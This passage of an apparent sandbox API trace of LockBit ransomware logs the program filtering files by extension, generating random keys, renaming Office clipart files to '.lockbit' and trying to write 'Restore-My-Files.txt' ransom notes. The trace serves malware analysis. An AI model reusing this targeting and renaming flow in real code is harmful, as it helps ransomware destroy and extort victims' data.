(lpString1=".prf", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.882] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.882] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.883] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.883] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.883] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.883] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.883] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.883] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.883] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.883] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.883] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.883] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.883] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.883] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.883] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.883] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.883] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0153516.WMF") returned 1 [0146.883] lstrcmpiW (lpString1="ntldr", lpString2="J0153516.WMF") returned 1 [0146.883] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0153516.WMF") returned 1 [0146.883] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0153516.WMF") returned -1 [0146.883] lstrcmpiW (lpString1="autorun.inf", lpString2="J0153516.WMF") returned -1 [0146.883] lstrcmpiW (lpString1="thumbs.db", lpString2="J0153516.WMF") returned 1 [0146.883] lstrcmpiW (lpString1="iconcache.db", lpString2="J0153516.WMF") returned -1 [0146.883] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.883] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF") returned=".WMF" [0146.883] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.883] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.883] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.883] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.883] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.883] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.883] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.883] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.883] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.883] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.883] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.884] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.884] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.884] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.884] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.884] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.884] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.884] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.884] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.884] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.884] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.884] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.884] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.884] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.884] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.884] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.884] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.884] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.884] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF.lockbit") returned 72 [0146.884] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153516.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0146.885] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.885] malloc (_Size=0x40068) returned 0x3df0008 [0146.885] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7432) returned 1 [0146.885] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.886] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0146.886] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.886] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0146.886] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0146.890] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.890] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.890] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0146.891] free (_Block=0x1fa2ed8) [0146.891] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.891] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.891] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.891] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56478790, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x30f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0153518.WMF", cAlternateFileName="")) returned 1 [0146.891] lstrcmpiW (lpString1=".", lpString2="J0153518.WMF") returned -1 [0146.891] lstrcmpiW (lpString1="..", lpString2="J0153518.WMF") returned -1 [0146.891] PathFindExtensionW (pszPath="J0153518.WMF") returned=".WMF" [0146.891] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.891] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.891] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.891] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.891] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.891] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.891] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.891] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.891] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.891] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.891] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.891] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.891] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.891] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.891] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.891] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.892] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.892] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0153518.WMF") returned 1 [0146.892] lstrcmpiW (lpString1="ntldr", lpString2="J0153518.WMF") returned 1 [0146.892] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0153518.WMF") returned 1 [0146.893] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0153518.WMF") returned -1 [0146.893] lstrcmpiW (lpString1="autorun.inf", lpString2="J0153518.WMF") returned -1 [0146.893] lstrcmpiW (lpString1="thumbs.db", lpString2="J0153518.WMF") returned 1 [0146.893] lstrcmpiW (lpString1="iconcache.db", lpString2="J0153518.WMF") returned -1 [0146.893] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.893] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF") returned=".WMF" [0146.893] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.893] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.893] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.893] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.893] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.893] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.893] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.893] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.893] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.893] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.893] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.893] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.893] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.893] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.893] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.893] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.893] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.893] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.893] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.893] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.893] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.893] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.893] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.893] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.893] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.893] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.893] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.894] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.894] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF.lockbit") returned 72 [0146.894] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153518.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0146.894] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.894] malloc (_Size=0x40068) returned 0x3df0008 [0146.894] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=12528) returned 1 [0146.895] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.895] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0146.895] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.896] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0146.896] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0146.902] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.902] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.902] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0146.904] free (_Block=0x1fa2ed8) [0146.904] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.904] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.904] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.904] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56478790, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x560, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0156537.WMF", cAlternateFileName="")) returned 1 [0146.904] lstrcmpiW (lpString1=".", lpString2="J0156537.WMF") returned -1 [0146.904] lstrcmpiW (lpString1="..", lpString2="J0156537.WMF") returned -1 [0146.904] PathFindExtensionW (pszPath="J0156537.WMF") returned=".WMF" [0146.904] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.904] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.904] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.904] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.904] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.905] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.905] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.905] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.905] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.905] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.905] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.905] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.905] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.905] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.905] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.905] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.905] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.905] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.905] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.905] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.905] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.905] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.905] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.905] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.905] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.905] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.905] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.905] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.905] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.905] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.905] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.905] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.905] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.905] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.906] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.906] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.906] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.906] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.906] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.906] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.906] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.906] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.906] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.906] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.906] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.906] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.906] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.906] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0156537.WMF") returned 1 [0146.906] lstrcmpiW (lpString1="ntldr", lpString2="J0156537.WMF") returned 1 [0146.906] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0156537.WMF") returned 1 [0146.906] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0156537.WMF") returned -1 [0146.906] lstrcmpiW (lpString1="autorun.inf", lpString2="J0156537.WMF") returned -1 [0146.906] lstrcmpiW (lpString1="thumbs.db", lpString2="J0156537.WMF") returned 1 [0146.906] lstrcmpiW (lpString1="iconcache.db", lpString2="J0156537.WMF") returned -1 [0146.906] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.906] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF") returned=".WMF" [0146.906] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.906] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.906] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.906] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.906] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.907] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.907] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.907] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.907] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.907] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.907] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.907] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.907] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.907] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.907] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.907] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.907] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.907] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.907] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.907] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.907] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.907] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.907] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.907] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.907] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.907] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.907] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.907] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.907] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF.lockbit") returned 72 [0146.908] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0156537.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0146.919] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.919] malloc (_Size=0x40068) returned 0x3df0008 [0146.919] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1376) returned 1 [0146.919] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.920] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0146.920] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.920] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0146.920] 